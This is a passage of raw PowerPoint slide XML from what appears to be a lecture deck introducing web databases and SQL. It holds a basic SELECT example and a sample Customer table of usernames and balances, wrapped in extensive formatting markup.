                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="934232">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="40458C"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="257075" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="257075" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="257075" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE54185F-1579-F54B-8510-B9B64BF36241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="2984435"/>
            <a:ext cx="1188464" cy="673165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9430E231-DC27-564C-99B4-CFCAA10A6571}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611476" y="3739607"/>
            <a:ext cx="1465723" cy="451393"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8979F7D-E5F1-254D-9D4C-7BC25E985C88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6946862" y="2562226"/>
            <a:ext cx="1054138" cy="1171574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB93757B-FF49-1647-B8EE-4CB0EEF0AFC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611477" y="4443775"/>
            <a:ext cx="1742877" cy="247740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"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488966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912D53-5C12-6148-93FD-0CED365D9128}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFA777CC-FD6C-8348-A0BF-754DA0E7DA8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Widely used by web services to store server and user information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database runs as separate process to which web server connects:              web server sends queries or commands derived  from incoming HTTP request; database server returns associated values or modifies/updates values;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33403152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32CE1D-6A1B-0349-8823-453EC78E8714}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06AD2869-185D-A946-8004-3567C3FE5184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Widely used database query language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Fetch a set of rows                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT column FROM table WHERE condition </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>returns the value(s) of the given column in the specified  table, for all records where condition is true.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379054064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32CE1D-6A1B-0349-8823-453EC78E8714}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06AD2869-185D-A946-8004-3567C3FE5184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example:                                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT Balance FROM Customer WHERE Username='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bgates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'                                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>returns the value of 79.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24F2D47C-D36C-5242-8B8A-4F6CF8FE23ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181038310"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="938213" y="3526732"/>
          <a:ext cx="5538787" cy="3026468"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1533683">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2103337">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1901767">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="478509">
                <a:tc gridSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="27940" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="185"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" i="0" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Customer</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600" i="0" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>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000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="478509">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>AcctNum</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="21618" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Username</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="21618" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>B</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>alance</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="21618" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="574912">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>1199</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600" kern="1200">
                        <a:solidFill>
                          <a:srgbClr val="40458C"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="77122" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>zuckerberg</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="77122" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="99695" marR="63500" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="660"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>35.7</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="77122" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="0000FF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
